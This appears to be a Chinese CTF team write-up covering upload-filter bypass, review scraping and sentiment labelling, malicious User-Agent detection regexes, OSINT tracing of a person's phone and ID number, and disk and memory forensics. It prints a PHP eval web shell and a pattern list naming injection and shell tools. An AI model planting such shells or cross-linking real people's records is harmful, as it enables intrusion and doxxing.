数据安全#

ez_upload | @Rusty#

明显考察的是文件上传漏洞，按顺序一个个试，先上传了个txt和png、jpg，都不行，然后试试php，也不行，看来对文件后缀的过滤很严格。最后测试phtml可以实现绕过

直接上传<?php发现会被拦截，经测试用短标签<?=可以绕过

参考链接：https://blog.csdn.net/m0_53008479/article/details/123366077

挂马 te.phtml

1
<?=eval($_POST['ant'])?>

蚁剑连接，找到 rsa 文件夹

/var/www/rssss4a

模型安全#

数据预处理#

网页数据需要从原始 HTML 结构中提取，每个商品的链接为

http://47.117.186.154:32903/index.php?controller=product&action=detail&id=<:id>

id 为 1-500 的纯数字，因为有情感色彩分析，考虑用本地 ollama

先写一个数据抓取脚本，来抓取数据

1
from bs4 import BeautifulSoup
2
import csv
3
import httpx
4
from tqdm import tqdm
5

# Crawl product pages 1-500 and flatten product + review data into data.csv.
PRODUCT_URL = "http://47.117.186.154:32903/index.php?controller=product&action=detail&id={}"


def _find_in(parent, *args, **kwargs):
    """Call parent.find(...), returning None when the parent element is missing."""
    return parent.find(*args, **kwargs) if parent is not None else None


def _clean_text(element, label=''):
    """Return the element's stripped text with `label` removed, or '' when it is missing."""
    if element is None:
        return ''
    return element.text.replace(label, '').strip()


data_list = []

# One client for all requests so the connection to the target host is reused.
with httpx.Client() as client:
    for i in tqdm(range(1, 501)):
        html_content = client.get(PRODUCT_URL.format(i)).text
        soup = BeautifulSoup(html_content, 'html.parser')

        # Product fields; a missing container yields '' instead of AttributeError.
        product_fields = {
            '商品ID': i,
            '商品名称': _clean_text(
                _find_in(soup.find('section', class_='product-detail'), 'h2')),
            '商品销量': _clean_text(soup.find('span', id='productSales')),
            '商品价格': _clean_text(soup.find('span', id='productPrice')),
            '商品描述': _clean_text(
                _find_in(soup.find('div', class_='product-description'), 'p')),
        }

        # Placeholder row so products without reviews still appear in the CSV;
        # the later scripts skip rows whose username is "Luminoria".
        data_list.append({
            **product_fields,
            '用户ID': -1,
            '用户名': "Luminoria",
            '电话': "1145141919810",
            'UA': "NOT_A_UA",
            '评论内容': "NO_COMMENT",
        })

        # One row per review.
        reviews_section = soup.find('section', class_='product-reviews')
        reviews = (reviews_section.find_all('div', class_='review-item')
                   if reviews_section is not None else [])

        for review in reviews:
            reviewer_info = review.find('div', class_='reviewer-info')
            data_list.append({
                **product_fields,
                '用户ID': _clean_text(
                    _find_in(reviewer_info, 'span', class_='user-id'), '用户ID：'),
                '用户名': _clean_text(
                    _find_in(reviewer_info, 'span', class_='reviewer-name'), '用户名：'),
                '电话': _clean_text(
                    _find_in(reviewer_info, 'span', class_='reviewer-phone'), '联系电话：'),
                'UA': _clean_text(
                    _find_in(reviewer_info, 'span', class_='user-agent'), '使用设备：'),
                '评论内容': _clean_text(review.find('div', class_='review-content')),
            })

# Write the CSV file
csv_file_path = 'data.csv'
csv_columns = ['商品ID', '商品名称', '商品销量', '商品价格', '商品描述', '用户ID', '用户名', '电话', 'UA', '评论内容']

with open(csv_file_path, 'w', newline='', encoding='utf-8') as csvfile:
    writer = csv.DictWriter(csvfile, fieldnames=csv_columns)
    writer.writeheader()
    writer.writerows(data_list)

print(f"数据已保存到 {csv_file_path}")

得到一个含有所有内容的 csv 文件，然后拿着这个 CSV 做题

数据标注与完整性校验 | @Luminoria#

任务一（数据标注与完整性校验）：针对在线团购平台提供的原始用户评论数据，爬取用户评论数据，进行情感标注（正面/负面），并基于用户ID、用户名、手机号生成MD5签名以校验完整性。按附件模板和任务书要求提交处理后的submit_1.csv文件进行评分。

用 qwen 进行情感判断

1
import csv
2
import ollama
3
import hashlib
4
from tqdm import tqdm
5

def get_sentiment_from_ollama(text):
    """Classify a review as positive or negative using a local Ollama model.

    Args:
        text (str): Review text to analyse.

    Returns:
        int | None: 1 when the model reply contains '正面', 0 when it
        contains '负面' (checked in that order), None when the reply contains
        neither or the model call raises.
    """
    prompt = f"请分析以下评论的情感色彩，判断是正面还是负面。如果评论是正面的，请回答 '正面'，如果是负面的，请回答 '负面'。只返回 '正面' 或 '负面' 两个词，如果你认为是中性的，你应该回答 '正面'\n评论内容：\n{text}\n情感色彩:"
    try:
        response = ollama.chat(
            model='qwen2.5:7B',
            messages=[{'role': 'user', 'content': prompt}],
        )
        sentiment_label = response['message']['content'].strip()
    except Exception as e:
        # Best effort: one failed call must not abort the whole batch.
        print(f"Ollama 调用出错: {e}, 评论文本: {text}")
        return None

    if "正面" in sentiment_label:
        return 1
    if "负面" in sentiment_label:
        return 0
    print(f"Ollama 无法识别情感: {sentiment_label}, 评论文本: {text}")
    return None
36

def calculate_signature(user_id, username, phone):
    """Return the MD5 hex digest of user_id + username + phone.

    Args:
        user_id: User ID.
        username: User name.
        phone: User phone number.

    Returns:
        str: 32-character lowercase hex MD5 of the UTF-8 encoded concatenation.

    All three values are converted with str() before concatenation, so
    numeric IDs or phone numbers are accepted as well as strings.
    """
    signature_string = f"{user_id}{username}{phone}"
    return hashlib.md5(signature_string.encode('utf-8')).hexdigest()
52

def process_comments_and_sentiment(input_csv_file, output_csv_file):
    """Label every review in the scraped CSV and write user_id/label/signature rows.

    Args:
        input_csv_file (str): Path of the scraped CSV (data.csv).
        output_csv_file (str): Path of the result CSV.

    Placeholder rows (username "Luminoria") are skipped. Reviews for which
    get_sentiment_from_ollama returns None are left out of the output; that
    function prints a message for each of them.
    """
    output_data = []

    # newline='' lets the csv module handle line breaks inside quoted fields.
    with open(input_csv_file, 'r', encoding='utf-8', newline='') as infile:
        for row in tqdm(csv.DictReader(infile)):
            username = row['用户名']
            if username == "Luminoria":  # placeholder row produced by the scraper
                continue

            sentiment_label = get_sentiment_from_ollama(row['评论内容'])
            if sentiment_label is None:
                continue

            user_id = row['用户ID']
            output_data.append({
                'user_id': user_id,
                'label': sentiment_label,
                'signature': calculate_signature(user_id, username, row['电话']),
            })

    csv_columns = ['user_id', 'label', 'signature']
    with open(output_csv_file, 'w', newline='', encoding='utf-8') as outfile:
        writer = csv.DictWriter(outfile, fieldnames=csv_columns)
        writer.writeheader()
        writer.writerows(output_data)

    print(f"评论情感分析完成，结果已保存到 {output_csv_file}")


if __name__ == "__main__":
    input_csv_file = 'data.csv'
    output_csv_file = 'q1.csv'
    process_comments_and_sentiment(input_csv_file, output_csv_file)

得到 q1.csv 改名 submit_1.csv 交了就行

数据清洗及特征工程 | @Luminoria#

一样是使用 qwen2.5-7B 进行分类判断，其他正常清洗即可

1
import csv
2
import ollama
3
from tqdm import tqdm
4

def get_category_id_from_ollama(product_name, category_list_str):
    """Ask a local Ollama model for the best-matching category ID of a product.

    Args:
        product_name (str): Product name.
        category_list_str (str): Category list, one "id. name" entry per line.

    Returns:
        str | None: The category ID as a digit string, or None when the reply
        does not contain exactly one number or the model call raises.
    """
    import re  # local import: this script's import header does not include re

    prompt = f"请根据商品名称 '{product_name}'，从以下分类列表中选择最合适的分类ID。只返回ID数字，不要返回其他文字。\n分类列表:\n{category_list_str}\n分类ID:"
    try:
        response = ollama.chat(
            model='qwen2.5:7b',
            messages=[{'role': 'user', 'content': prompt}],
        )
        reply = response['message']['content'].strip()
    except Exception as e:
        # Best effort: one failed call must not abort the whole batch.
        print(f"Ollama 调用出错: {e}, 商品名称: {product_name}")
        return None

    # The model often decorates the answer ("12. 彩妆", "分类ID: 12"); accept
    # any reply holding exactly one number, reject ambiguous ones.
    numbers = re.findall(r'\d+', reply)
    if len(numbers) == 1:
        return numbers[0]

    print(f"Ollama 返回的分类ID不是数字: {reply}, 商品名称: {product_name}")
    return None
33

def _parse_sales(raw_sales):
    """Convert a raw sales string to a non-negative int; unparsable or negative values become 0."""
    try:
        sales = int(float(raw_sales.replace(',', '')))
    except (ValueError, OverflowError):
        # Covers '', non-numeric text, 'nan' and 'inf'.
        return 0
    return max(sales, 0)


def clean_data_and_categorize(input_csv_file, output_csv_file):
    """Aggregate the scraped CSV per product and write the cleaned result.

    For every product ID the output holds the cleaned sales figure (taken from
    the first row seen for that product), the category ID chosen by
    get_category_id_from_ollama ('0' when it returns nothing) and the number
    of review rows. Rows are sorted by numeric product ID.

    Args:
        input_csv_file (str): Path of the scraped CSV (data.csv).
        output_csv_file (str): Path of the result CSV.
    """
    category_list = {
        1: "手机", 2: "母婴用品", 3: "家具", 4: "书籍", 5: "蔬菜", 6: "厨房用具", 7: "办公", 8: "睡衣", 9: "宠物",
        10: "运动", 11: "热水器", 12: "彩妆", 13: "保健品", 14: "酒水", 15: "玩具乐器", 16: "汽车", 17: "床上用品",
        18: "洗护用品", 19: "五金", 20: "户外", 21: "珠宝", 22: "医疗器械", 23: "花卉园艺", 24: "游戏", 25: "园艺"
    }
    category_list_str = "\n".join([f"{k}. {v}" for k, v in category_list.items()])

    product_data = {}   # product ID -> sales / review count / category ID
    product_names = {}  # product ID -> product name, one entry per product

    with open(input_csv_file, 'r', encoding='utf-8', newline='') as infile:
        for row in csv.DictReader(infile):
            product_id = row['商品ID']

            if product_id not in product_data:
                product_data[product_id] = {
                    '销量': _parse_sales(row['商品销量']),
                    '评论总数': 0,
                    '分类ID': None,
                }
                product_names[product_id] = row['商品名称']

            if row["用户名"] == "Luminoria":  # placeholder row produced by the scraper
                continue
            product_data[product_id]['评论总数'] += 1

    # One model call per distinct product.
    for product_id, product_name in tqdm(product_names.items()):
        category_id = get_category_id_from_ollama(product_name, category_list_str)
        product_data[product_id]['分类ID'] = category_id if category_id else '0'

    # Row keys must match the DictWriter fieldnames below; otherwise
    # writerows() raises ValueError.
    csv_columns = ['product_id', 'sales', 'category_id', 'reviews_number']
    output_data = [
        {
            'product_id': product_id,
            'sales': product_data[product_id]['销量'],
            'category_id': product_data[product_id]['分类ID'] or '0',
            'reviews_number': product_data[product_id]['评论总数'],
        }
        for product_id in sorted(product_data, key=int)
    ]

    with open(output_csv_file, 'w', newline='', encoding='utf-8') as outfile:
        writer = csv.DictWriter(outfile, fieldnames=csv_columns)
        writer.writeheader()
        writer.writerows(output_data)

    print(f"数据清洗、分类和聚合完成，结果已保存到 {output_csv_file}")


if __name__ == "__main__":
    input_csv_file = 'data.csv'
    output_csv_file = 'submit_2.csv'
    clean_data_and_categorize(input_csv_file, output_csv_file)

然后将保存的 submit_2.csv 提交就行

隐私保护与恶意检测 | @Luminoria#

因为不存在需要 AI 判断的东西，所以直接用 re 抓关键词就行

1
import csv
2
import re
3
from tqdm import tqdm
4
import ollama
5

def desensitize_phone(phone):
    """Mask a phone number as first three digits + '****' + last four digits.

    Args:
        phone: Phone number; converted with str() and stripped of every
            non-digit character before masking.

    Returns:
        str: The masked number, or '' when fewer than 7 digits remain.
    """
    digits = re.sub(r'\D', '', str(phone))
    if len(digits) < 7:
        return ''
    return f"{digits[:3]}****{digits[-4:]}"
12

# Case-insensitive signatures for malicious User-Agent payloads, compiled once.
_MALICIOUS_UA_PATTERNS = tuple(
    re.compile(pattern, re.IGNORECASE)
    for pattern in (
        # SQL injection
        r';\s*(select|insert|update|delete|drop)\b',
        r'\bunion\s+select\b',
        r'\bselect\b.*\bfrom\b',
        # XSS
        r'<\s*script\b.*?>.*?<\s*/\s*script\s*>',
        r'onerror\s*=',
        r'onload\s*=',
        # Command execution
        r'(\|\||&&|\$\(|\b(wget|curl|rm|ls|cat|echo)\b)',
        # Code execution
        r'\b(eval|exec|system|passthru|shell_exec)\s*\(',
    )
)


def is_malicious(ua):
    """Report whether a User-Agent string matches any malicious-payload signature.

    Args:
        ua (str): User-Agent value taken from the scraped data.

    Returns:
        bool: True when any pattern matches; False for empty values, for the
        scraper placeholder "NOT_A_UA", and when nothing matches.
    """
    if not ua or ua.strip() == "NOT_A_UA":
        return False
    return any(pattern.search(ua) for pattern in _MALICIOUS_UA_PATTERNS)
36

# Load every real review row once; scraper placeholder rows (username
# "Luminoria") are dropped here.
with open('data.csv', 'r', encoding='utf-8', newline='') as f_in:
    review_rows = [row for row in csv.DictReader(f_in) if row['用户名'] != 'Luminoria']

valid_rows = len(review_rows)

# Mask the phone number and check the User-Agent of each review row.
processed = []
for row in tqdm(review_rows, total=valid_rows, desc="Processing", unit="row"):
    is_mal = is_malicious(row['UA'])
    processed.append({
        'user_id': int(row['用户ID']),
        'desensitization': desensitize_phone(row['电话']),
        # 'FALSE' marks a User-Agent that matched a malicious pattern.
        'code_check': 'FALSE' if is_mal else 'TRUE',
    })

# Sort by user_id ascending
processed.sort(key=lambda x: x['user_id'])

# Write the result file
with open('submit_3.csv', 'w', newline='', encoding='utf-8') as f_out:
    writer = csv.DictWriter(f_out, fieldnames=['user_id', 'desensitization', 'code_check'])
    writer.writeheader()
    writer.writerows(processed)

print("处理完成，结果已保存至 submit_3.csv")

然后直接交出来的文件就行

社会工程#

张华强的公司名称 | @Luminoria @Ron#

个人做法#

在队友给了公司名的情况下，用脚本去搜题目提供的工商信息里面的内容

1
import os
2
import openpyxl
3

def search_keyword_in_excel(folder_path, keyword):
    """Print every row of every .xlsx file in a folder that contains a keyword.

    Args:
        folder_path: Folder holding the .xlsx files (not searched recursively).
        keyword: Substring to look for in the string form of each cell value.

    Empty cells are never treated as a match. Errors while reading a file are
    printed and the scan continues with the next file.
    """
    found_files = False  # set once any file contains the keyword

    for filename in os.listdir(folder_path):
        if not filename.endswith(".xlsx"):
            continue

        file_path = os.path.join(folder_path, filename)
        print(f"正在处理文件: {filename}")
        found_in_file = False  # set once the current file contains the keyword

        try:
            workbook = openpyxl.load_workbook(file_path)
            for sheet_name in workbook.sheetnames:
                sheet = workbook[sheet_name]
                for row_index, row in enumerate(sheet.rows, start=1):
                    # Test the raw cell values: str(None) is "None", which
                    # would otherwise match keywords such as "on".
                    if not any(
                        cell.value is not None and keyword in str(cell.value)
                        for cell in row
                    ):
                        continue
                    found_in_file = True
                    found_files = True
                    row_values = [str(cell.value) for cell in row]
                    print(f"  - 表单: {sheet_name}, 行号: {row_index}, 内容: {row_values}")

            if not found_in_file:
                print(f"  - 未在文件中找到关键词 '{keyword}'。")
            else:
                print(f"  - 在文件中找到关键词 '{keyword}'。")

        except Exception as e:
            # Best effort: a broken workbook must not stop the scan.
            print(f"  - 处理文件 {filename} 时出错: {e}")

    if not found_files:
        print(f"在文件夹 '{folder_path}' 中没有任何文件包含关键词 '{keyword}'。")


if __name__ == "__main__":
    folder_to_search = "gongshang"
    keyword_to_find = "博林科技"

    if not os.path.exists(folder_to_search):
        print(f"错误: 文件夹 '{folder_to_search}' 不存在。请确保文件夹路径正确。")
    else:
        print(f"开始在文件夹 '{folder_to_search}' 中搜索关键词 '{keyword_to_find}'...")
        search_keyword_in_excel(folder_to_search, keyword_to_find)
        print("搜索完成。")

在 data47.xlsx 中能找到相关的信息

1
正在处理文件: data47.xlsx
2
  - 表单: Sheet1, 行号: 5216, 内容: ['99640928131194569978', '杭州市', '闵行区星辰信息技术园', '江苏博林科技有限公司']
3
  - 在文件中找到关键词 '博林科技'。

队友做法#

1
import sqlite3
2
import os
3
import datetime
4
import csv
5
from collections import defaultdict
6

def get_db_path(date):
    """Return the path of the ride database for `date` (a 'YYYY-MM-DD' string)."""
    return f"./附件/rides/{date}.db"
9

def query_data(start_date, end_date):
    """Count weekday rides per (name, phone) for users whose name starts with 张.

    Args:
        start_date (datetime.date): First day to scan (inclusive).
        end_date (datetime.date): Last day to scan (inclusive).

    Returns:
        list: ((name, phone), ride_count) tuples sorted by ride_count,
        highest first. Days without a database file are skipped.
    """
    current_date = start_date
    user_rides = defaultdict(int)

    while current_date <= end_date:
        print(current_date)
        db_path = get_db_path(current_date.strftime('%Y-%m-%d'))
        if os.path.exists(db_path):
            conn = sqlite3.connect(db_path)
            try:
                cursor = conn.cursor()
                # strftime('%w') is '0' for Sunday, so '1'..'5' selects Mon-Fri.
                cursor.execute("""
                    SELECT name, phone
                    FROM location_data
                    WHERE strftime('%w', date) BETWEEN '1' AND '5'
                    AND name LIKE '张%'
                """)
                for name, phone in cursor.fetchall():
                    user_rides[(name, phone)] += 1
            finally:
                # Release the connection even when the query fails.
                conn.close()

        current_date += datetime.timedelta(days=1)

    sorted_rides = sorted(user_rides.items(), key=lambda x: x[1], reverse=True)
    return sorted_rides


if __name__ == "__main__":
    start_date = datetime.date(2024, 12, 1)
    end_date = datetime.date(2024, 12, 31)
    results = query_data(start_date, end_date)

    with open("result.csv", "w", newline="", encoding="utf-8") as file:
        writer = csv.writer(file)
        writer.writerow(["Name", "Phone", "Rides"])
        for (name, phone), count in results:
            writer.writerow([name, phone, count])

    for (name, phone), count in results:
        print(f"{name} ({phone}): {count} rides")

先用Python 拿到每个用户（用户名和手机号一致为一个）在周一到周五打车的数据条目数

发现138****9377遥遥领先

在db中翻找发现周一到周五都有打车，周末没有，基本符合 张某的生活习惯为：周一到周五从家打车去公司，周末无明显固定作息

在快递中搜索手机号找到数据

1
MF7297484562175167 2025-01-21 宋** 134****9281 **市**区******中心32楼兰金电子 张** 138****9377 **市**区******息技术园16楼博林科技
2
MF3442357592017816 2025-02-01 金** 188****9754 **市**区******来智汇园6楼易动力信 张** 138****9377 **市**区******息技术园16楼博林科技

结合爬取的工商信息，提交张某所属公司的全称

答案为：江苏博林科技有限公司

张华强的手机号 | @Luminoria @Ron#

个人做法#

还是跑脚本

1
import os
2
import re
3
from bs4 import BeautifulSoup
4
from tqdm import tqdm
5

def extract_info_from_html(html_content):
    """Extract the hidden phone number and ID number from a page mentioning 张华强.

    Args:
        html_content: HTML document as a string.

    Returns:
        dict | None: {'phone_number': ..., 'id_number': ...} when the page text
        contains "张华强", a div.hidden-info holds exactly two '|'-separated
        parts, and the first part matches 138****9377; otherwise None.
    """
    soup = BeautifulSoup(html_content, 'html.parser')

    # Fragments without a <body> have soup.body == None; search the whole
    # document in that case instead of raising AttributeError.
    page_root = soup.body if soup.body is not None else soup
    if "张华强" not in page_root.get_text():
        return None

    hidden_info_div = soup.find('div', class_='hidden-info')
    if hidden_info_div is None:
        return None

    # Strip each part so surrounding whitespace in the markup does not break
    # the phone-number match.
    parts = [part.strip() for part in hidden_info_div.text.split('|')]
    if len(parts) != 2:
        return None

    phone_number, id_number = parts
    # The phone number must have the form 138****9377.
    phone_pattern = re.compile(r'^138\d{4}9377$')
    if phone_pattern.match(phone_number):
        return {'phone_number': phone_number, 'id_number': id_number}
    return None
37

def traverse_webpages(folder_path):
    """Walk a folder tree and print the data extracted from every matching .html file.

    Args:
        folder_path: Root folder of the saved web pages.

    A file that cannot be read or parsed is reported and skipped.
    """
    for root, dirs, files in os.walk(folder_path):
        for file in tqdm(files):
            if not file.endswith(".html"):
                continue

            file_path = os.path.join(root, file)
            try:
                with open(file_path, 'r', encoding='utf-8') as f:
                    html_content = f.read()
                # Parse after the file handle has been released.
                extracted_data = extract_info_from_html(html_content)
            except Exception as e:
                # Best effort: one bad page must not stop the scan.
                print(f"处理文件 {file_path} 出错: {e}")
                continue

            if extracted_data:
                print(f"在文件: {file_path} 中找到匹配信息:")
                print(f"  手机号: {extracted_data['phone_number']}")
                print(f"  身份证号: {extracted_data['id_number']}")
                print("-" * 30)


if __name__ == "__main__":
    webpage_folder = "webpage"
    traverse_webpages(webpage_folder)

1
在文件: webpage\40\5840.html 中找到匹配信息:
2
  手机号: 13891889377
3
    身份证号: 61050119980416547X

队友做法#

使用 cat ./{文件夹ID}/*.html | grep -E "138[0-9]{4}9377|张华强" 逐个找信息，遍历文件夹ID，发现在40号文件夹出现结果

1
cat ./40/*.html | grep -E "138[0-9]{4}9377|张华强"

答案为：13891889377

张华强的身份证号 | @Luminoria @Ron#

使用 cat ./{文件夹ID}/*.html | grep -E "138[0-9]{4}9377|张华强" 逐个找信息，遍历文件夹ID，发现在40号文件夹出现结果

1
cat ./40/*.html | grep -E "138[0-9]{4}9377|张华强"

跟着第三题，一起出

61050119980416547X

张华强的车牌号 | @Luminoria @Ron#

用OCR识别图片中的手机号

1
import os
2
import pytesseract
3
from PIL import Image
4
import re
5

def find_number_in_image(image_path, target_number):
    """OCR an image and return its text when it contains the target number.

    Args:
        image_path: Path of the image file.
        target_number: Number to look for, matched as a whole word.

    Returns:
        str | None: The full OCR text when the number is found; None when it
        is not found or the image cannot be processed.
    """
    try:
        # The context manager closes the file handle; the scan covers
        # thousands of images.
        with Image.open(image_path) as img:
            text = pytesseract.image_to_string(img, lang='eng')
    except Exception as e:
        print(f"处理图片 {image_path} 时出错: {e}")
        return None

    pattern = r"\b" + re.escape(target_number) + r"\b"
    return text if re.search(pattern, text) else None
21

def main():
    """Scan every .jpg in the parking folder and print the OCR text of images containing the phone number."""
    parking_folder = "./附件/parking"
    target_number = "13891889377"

    if not os.path.exists(parking_folder):
        print(f"文件夹 '{parking_folder}' 不存在，请检查路径。")
        return

    found_in_images = []

    for c, filename in enumerate(os.listdir(parking_folder), start=1):
        if filename.lower().endswith('.jpg'):
            image_path = os.path.join(parking_folder, filename)
            result = find_number_in_image(image_path, target_number)
            if result:
                print(f"{filename}r : {result}")
                found_in_images.append(filename)
        # Progress line, overwritten in place by the next iteration.
        print(f"{c} {filename}", end='\r')

    if not found_in_images:
        print("Nothing Found")


if __name__ == "__main__":
    main()

在1357.jpg里面找到了手机号

数据分析#

溯源与取证#

硬盘取证 Word 恢复 | @Ron#

DG打开img扫描删除的文件

用DG恢复文档

染色后找到flag

内存取证及日志分析 | @Ron#

DiskGenius打开查看分区起始位置

使用Linux mount img文件

1
sudo mount -o loop,offset=32256 ./disk1.img /mnt #offset=512*63=32256

将7z文件复制出来解压得到内存镜像

使用 volatility3 扫描文件

1
vol -f ./WIN-IRBP5Q8F25I-20250306-172341.raw  windows.filescan.FileScan > filelist.txt

发现log文件，dump下来

1
vol -f ./WIN-IRBP5Q8F25I-20250306-172341.raw windows.dumpfiles.DumpFiles --physaddr 0x7c23ba40

直接打开很明显的sql注入

故114.10.143.92即为攻击者IP